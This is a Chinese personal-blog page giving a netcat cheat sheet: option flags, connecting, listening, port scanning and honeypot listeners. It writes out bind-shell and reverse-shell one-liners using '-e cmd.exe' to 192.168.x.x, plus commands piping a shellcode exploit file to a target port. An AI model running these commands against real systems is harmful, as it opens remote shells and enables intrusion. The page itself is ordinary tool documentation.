<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    
    <title>
        Netcat | Ma4out7&#39;Blog
    </title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
        <link rel="shortcut icon" href="/images/avatar.jpg">
    
    
<link rel="stylesheet" href="/css/style.css">

    <script id="hexo-configurations">
    let CONFIG = {"hostname":"example.com","root":"/","localsearch":{"enable":false,"trigger":"auto","unescape":false,"preload":false},"themeInfo":{"name":"ILS","version":"2.0.2","author":"XPoet","repository":"https://github.com/XPoet/hexo-theme-ils"}};
  </script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
<div class="page-container">

    <header class="page-header">
        <div class="header-progress"></div>
    </header>

    <main class="page-main">

        <div class="page-main-content">

            <div class="page-main-content-top">
                <header class="header-wrapper">

    <div class="header-content">

        <a class="logo-title" href="/">
            Ma4out7&#39;Blog
        </a>

        <ul class="menu-list">
            
                <li class="menu-item">
                    <a class=""
                       href="/"
                    >
                        首页
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/archives"
                    >
                        归档
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/categories"
                    >
                        分类
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/tags"
                    >
                        标签
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/links"
                    >
                        友链
                    </a>
                </li>
            
                <li class="menu-item">
                    <a class=""
                       href="/about"
                    >
                        关于
                    </a>
                </li>
            
        </ul>

        <div class="menu-bar">
            <div class="menu-bar-middle"></div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


            </div>

            <div class="page-main-content-middle">

                <main class="main-content normal-code-theme">

                    
                        <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <h3><a class="title-hover-animation">Netcat</a></h3>
        </div>

        <div class="meta-info">
            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa fa-calendar-o"></i> 2021-03-01 20:53:43
    </span>
    
        <span class="article-categories article-meta-item">
            <i class="fa fa-folder"></i>
            <ul>
                
                    <li>
                        <a href="/categories/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a>
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa fa-tags"></i>
            <ul>
                
                    <li>
                        <a href="/tags/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/">工具使用</a>
                    </li>
                
            </ul>
        </span>
    
    
    
    
</div>

        </div>

        <div class="article-content markdown-body">
            <ol>
<li>nc 使用:透过使用 TCP 或 UDP 协议的网络连接去读写数据</li>
</ol>
<ul>
<li>-d 后台模式<br>-e prog 程序重定向，一旦连接，就执行 [危险!!]<br>-g gateway source-routing hop point[s], up to 8<br>-G num source-routing pointer: 4, 8, 12, …<br>-h 帮助信息<br>-i secs 延时的间隔<br>-l 监听模式，用于入站连接<br>-L 连接关闭后,仍然继续监听<br>-n 指定数字的 IP 地址，不能用 hostname<br>-o file 记录 16 进制的传输<br>-p port 本地端口号<br>-r 随机本地及远程端口<br>-s addr 本地源地址<br>-t 使用 TELNET 交互方式<br>-u UDP 模式<br>-v 详细输出–用两个-v 可得到更详细的内容<br>-w secs timeout 的时间<br>-z 将输入输出关掉–用于扫描时</li>
</ul>
<p>端口的表示方法可写为 M-N 的范围格式。</p>
<p>基本用法：</p>
<p>大概有以下几种用法：</p>
<p>1)连接到 REMOTE 主机，例子：<br>格式：nc -nvv 192.168.x.x 80<br>讲解：连到 192.168.x.x 的 TCP80 端口</p>
<p>2)监听 LOCAL 主机，例子：<br>格式：nc -l -p 80<br>讲解：监听本机的 TCP80 端口</p>
<p>3)扫描远程主机，例子：<br>格式：nc -nvv -w2 -z 192.168.x.x 80-445<br>讲解：扫描 192.168.x.x 的 TCP80 到 TCP445 的所有端口</p>
<p>4)REMOTE 主机绑定 SHELL，例子：<br>格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe<br>讲解：绑定 REMOTE 主机的 CMDSHELL 在 REMOTE 主机的 TCP5354 端口</p>
<p>5)REMOTE 主机绑定 SHELL 并反向连接，例子：<br>格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354<br>讲解：绑定 REMOTE 主机的 CMDSHELL 并反向连接到 192.168.x.x 的 TCP5354 端口</p>
<p>以上为最基本的几种用法（其实 NC 的用法还有很多，<br>当配合管道命令“|”与重定向命令“&lt;”、“&gt;”等等命令功能更强大……）。</p>
<p>高级用法：</p>
<p>6)作攻击程序用，例子：<br>格式 1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80<br>格式 2：nc -nvv 192.168.x.x 80 &lt; c:exploit.txt<br>讲解：连接到 192.168.x.x 的 80 端口，并在其管道中发送 c:exploit.txt 的内容(两种格式确有相同的效果，真是有异曲同工之妙:P)</p>
<p>附：c:exploit.txt 为 shellcode 等</p>
<p>7)作蜜罐用[1]，例子：<br>格式：nc -L -p 80<br>讲解：使用-L(注意 L 是大写)可以不停地监听某一个端口，直到 ctrl+c 为止.</p>
<p>8)作蜜罐用[2]，例子：<br>格式：nc -L -p 80 &gt; c:log.txt<br>讲解：使用-L 可以不停地监听某一个端口，直到 ctrl+c 为止，同时把结果输出到 c:log.txt 中，如果把‘&gt;’改为‘&gt;&gt;’即可以追加日志。</p>
<p>附：c:log.txt 为日志等</p>
<p>9)作蜜罐用[3]，例子：<br>格式 1：nc -L -p 80 &lt; c:honeypot.txt<br>格式 2：type.exe c:honeypot.txt|nc -L -p 80<br>讲解：使用-L 可以不停地监听某一个端口，直到 ctrl+c 为止，并把 c:honeypot.txt 的内容‘送’入其管道中。</p>
<ol start="2">
<li>Linux kali 开启端口、关闭防火墙方法</li>
</ol>
<ul>
<li>nc -lp 23:打开 23 端口，但是需要监听</li>
<li>netstat -an | grep 23:查询 23 端口是否打开</li>
</ul>
<ol start="3">
<li>telnet:查看某个端口是否可访问</li>
</ol>
<ul>
<li>netstat -antup |grep 9998:查看监听</li>
</ul>

        </div>

        <div class="article-nav">
            
                <div class="article-prev">
                    <a class="prev btn"
                       rel="prev"
                       href="/2021/03/01/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/nmap/"
                    >
                        <i class="fa fa-chevron-left"></i> <span class="post-nav-title-item">Nmap</span><span class="post-nav-item">上一篇</span>
                    </a>
                </div>
            
            
                <div class="article-next">
                    <a class="next btn"
                       rel="next"
                       href="/2021/03/01/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/wireshark-tcpdump/"
                    >
                        <span class="post-nav-title-item">wireshark-tcpdump</span><span class="post-nav-item">下一篇</span> <i class="fa fa-chevron-right"></i>
                    </a>
                </div>
            
        </div>

        <div class="comment-container">
            <div class="comments-container">
    
        

    
</div>
        </div>
    </div>
</div>


                    

                </main>

            </div>

            <div class="page-main-content-bottom">
                <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy; 2021 <i class="fa fa-heart-o"></i> <a href="/">Ma4out7</a>
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动 | 主题 <a
                    href="https://github.com/XPoet/hexo-theme-ils" target="_blank">ILS v2.0.2</a>
        </div>
    </div>
</footer>

            </div>
        </div>
    </main>

    <div class="sidebar-tools">
        <div class="tools-container">
    <ul class="tools-list">
        
        <li class="mode-toggle">
            <i class="fa fa-moon-o"></i>
        </li>
        
        <li class="page-aside-toggle">
            <i class="fa fa-bars"></i>
        </li>
        
            <li class="scroll-to-top">
                <i class="fa fa-caret-up"></i>
            </li>
        
    </ul>
</div>

    </div>

    <!-- page aside -->
    <aside class="page-aside">
        
            <div class="post-toc-wrap">
    <div class="post-toc">
        
    </div>
</div>
        
    </aside>

</div>





<script src="/js/main.js"></script>
<script src="/js/header-shrink.js"></script>
<script src="/js/toggle-mode.js"></script>



    
<script src="/js/scroll-to-top.js"></script>





    
        
<script src="/js/code-copy.js"></script>

    

    
        
<script src="/lib/anime.min.js"></script>
<script src="/js/toc.js"></script>
<script src="/js/post-toc.js"></script>

    



</body>
</html>